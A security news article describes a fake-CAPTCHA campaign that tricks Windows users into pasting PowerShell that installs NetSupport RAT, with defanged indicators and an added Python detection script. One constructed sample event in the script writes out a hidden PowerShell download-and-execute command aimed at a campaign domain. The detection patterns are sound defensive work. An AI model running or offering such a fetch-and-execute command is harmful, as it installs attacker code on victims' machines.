Threat actors have been found exploiting the ubiquitous “Prove You Are Human” verification systems to distribute malicious software.
Specifically, this campaign leverages spoofed websites mimicking legitimate platforms like Gitcodes and DocuSign to deceive users into executing harmful PowerShell scripts on their Windows systems.
Deceptive CAPTCHA Tactics
These scripts initiate a multi-stage attack that ultimately installs the NetSupport Remote Access Trojan (RAT), a tool originally designed for legitimate administrative purposes but frequently abused by cybercriminals for unauthorized access and control.

The attack begins with users being lured to fraudulent websites such as gitcodes[.]org, branded as “Gitcodes – #1 paste tool since 2002!” or fake DocuSign verification pages like docusign.sa[.]com.
According to the report, these sites present users with seemingly innocuous CAPTCHA-like challenges that prompt them to copy and paste a provided script into the Windows Run prompt.
This initial script, often hosted on platforms like Gitcodes, acts as a downloader, fetching subsequent scripts from domains like tradingviewtool[.]com and tradingviewtoolz[.]com.
Sophisticated Multi-Stage Attack
Through a series of web requests, including check-ins with endpoints like https[:]//tradingviewtool[.]com/info2.php, the attack progresses through multiple stages, each script downloading and executing the next, culminating in the deployment of NetSupport RAT.
Persistence is achieved by embedding the malware, often disguised as “My Support” or via executables like client32.exe, into the Windows Registry’s Run key or Startup folder, ensuring it launches with every user login.
On the DocuSign spoofing front, the attackers employ clipboard poisoning techniques, where a ROT13-encoded script is copied to the victim’s clipboard upon interaction with a fake CAPTCHA checkbox.
Users are then instructed to paste and run this script via Win+R commands, triggering the download of additional payloads like wbdims.exe from GitHub or jp2launcher.exe from zipped archives.
These scripts communicate with command-and-control (C2) servers through endpoints like docusign.sa[.]com/verification/c.php, facilitating further malicious downloads and browser page refreshes to deepen the infection.

The intricate, multi-layered approach, involving repeated script executions and network calls to domains like mhousecreative[.]com or IP addresses such as 170.130.55[.]203:443, aims to evade detection by breaking the attack into smaller, less conspicuous steps.
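Detection logic for the three stages described above (the Win+R-launched PowerShell downloader, the "My Support"/client32.exe Run-key persistence, and the RunMRU history left behind by the paste-and-run step), written here as an added example that is not from the article or the report it cites. It runs over constructed Sysmon-style events, not real telemetry, and the indicator lists are taken from the article in their defanged form.

```python
"""Hunting rules for the fake-CAPTCHA -> PowerShell -> NetSupport RAT chain.
Events below are constructed Sysmon-style records, not captured telemetry."""
import re

# Indicators as printed in the article (defanged); refang() normalises them.
IOC_DOMAINS = {"tradingviewtool[.]com", "tradingviewtoolz[.]com",
               "docusign.sa[.]com", "mhousecreative[.]com"}
IOC_FILES = {"client32.exe", "wbdims.exe", "jp2launcher.exe"}
# Download-cradle markers typical of a pasted one-liner: web fetch, IEX, hidden window.
CRADLE = re.compile(r"(?i)(?:\b(?:iwr|invoke-webrequest|iex|invoke-expression)\b"
                    r"|-w(?:indowstyle)?\s+hidden)")

def refang(s):
    return s.replace("[.]", ".")

def hits_ioc_domain(text):
    """Return the set of article IOC domains present in text (defang-insensitive)."""
    low = refang(text.lower())
    return {d for d in IOC_DOMAINS if refang(d) in low}

def flag_event(ev):
    """Return the list of rule names that fire on one event; [] means benign."""
    findings = []
    if ev["type"] == "process":
        cmd, parent, img = ev["cmdline"], ev["parent"].lower(), ev["image"].lower()
        # Rule 1: Win+R paste chain, i.e. explorer.exe spawning PowerShell with a cradle.
        if (parent.endswith("explorer.exe") and img.endswith("powershell.exe")
                and (CRADLE.search(cmd) or hits_ioc_domain(cmd))):
            findings.append("clickfix_powershell_cradle")
        if hits_ioc_domain(cmd):
            findings.append("known_c2_domain")
        if any(f in cmd.lower() for f in IOC_FILES):
            findings.append("known_payload_name")
    elif ev["type"] == "registry":
        key, val = ev["key"].lower(), ev["value"].lower()
        # Rule 2: Run-key persistence named "My Support" or pointing at client32.exe.
        if "\\currentversion\\run\\" in key and ("my support" in key or "client32.exe" in val):
            findings.append("netsupport_run_key")
        # Rule 3: Win+R history (RunMRU) holding a PowerShell command the user pasted.
        if "\\runmru\\" in key and "powershell" in val:
            findings.append("runmru_powershell")
    return findings

def scan(events):
    """Map event index -> findings for every event that triggers at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := flag_event(ev))}

EVENTS = [  # constructed sample events
    {"type": "process", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://tradingviewtool[.]com/info2.php | iex"'},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\My Support",
     "value": "C:\\Users\\victim\\AppData\\Roaming\\MySupport\\client32.exe"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "value": "powershell -w hidden -c <pasted command>\\1"},
    {"type": "process", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for i, f in scan(EVENTS).items():
        print(i, f)
```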
This campaign’s infrastructure also reveals a broader ecosystem of abuse, with similar tactics observed on spoofed sites mimicking Okta and popular media apps, alongside malware hosting on platforms like Discord and GitHub.
While attribution remains unclear, patterns in domain registration (via Cloudflare, NameCheap, NameSilo), payload reuse, and delivery URLs suggest potential overlap with known threat groups like SocGholish or actors such as FIN7 and STORM-0408, all of whom have historically weaponized NetSupport Manager.
The sophistication lies in exploiting user trust in familiar online interactions, turning routine verifications into vectors for self-infection.
Cybersecurity experts urge vigilance: legitimate sites rarely demand script execution, and any such prompt warrants scrutiny.
Verifying URLs and SSL certificates, and avoiding unverified clipboard content, are critical steps to mitigate this threat, underscoring the need for continuous user education in an evolving landscape of social engineering attacks.